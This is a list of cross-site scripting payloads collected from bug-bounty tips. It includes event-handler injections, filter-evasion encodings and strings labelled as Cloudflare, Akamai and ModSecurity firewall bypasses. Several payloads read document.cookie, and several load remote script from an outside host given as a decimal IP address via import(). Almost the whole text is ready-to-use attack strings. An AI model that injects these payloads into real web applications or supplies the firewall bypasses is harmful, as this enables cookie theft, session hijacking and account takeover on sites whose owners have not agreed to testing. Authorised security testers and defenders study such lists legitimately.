Cross Site Scripting (XSS)

Payloads

<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg onload="alert(1)" <="" svg=""
GUYS bypassed cloud flare using this payload
"><x/Onpointerrawupdate=confirm(document.cookie)>kira_deathnote
‟><marquee/onstart=confirm(1)>
"onfocus="alert`1`"autofocus="
Useful #XSS Payloads -
"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
XSS
<body ontouchstart=alert(1)>
Triggers when a finger touch the screen
<body ontouchend=alert(1)>
Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)>
When a finger is dragged across the screen.
$` onerror=alert(1);//
" onfocus="alert(1)" autofocus="
<math><x xlink:href=javascript:confirm`1`>click
HTML INJECTION + XSS INJECTION
/<div+id=JavaScript>/<h1>_Y000!_
/<div+id=JavaScript>/<marquee>_Y000!_</marquee>
/<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>
𝘾𝙡𝙤𝙪𝙙𝙛𝙡𝙖𝙧𝙚 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<img src=x onError=import('//1152848220/')>
𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
𝙈𝙤𝙙_𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
#BugBounty #bugbountytip
Some payloads that worked for me in popping up a stored XSS:-
1. <img src=`xx:xx`onerror=alert(1)>
2. <div/onmouseover='alert(1)'> style="x:">
3. \";alert('XSS');//
4. "autofocus/onfocus=alert(1)//
5. '-alert(1)-'
Good luck!
xss payload + &NewLine;
<img src=`%00`&NewLine; onerror=alert`_Y000!_`&NewLine;
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert`_Y000!_`&NewLine;>_Y000!_</a>
<img src="X" onerror=top[8680439..toString(30)](1337)>
<input onfocus="alert('xss');" autofocus>
#BugBountyTip - Useful #XSS Payloads. Today I used this:
< a href="mailto:a"+/onmouseover=prompt(document.domain)>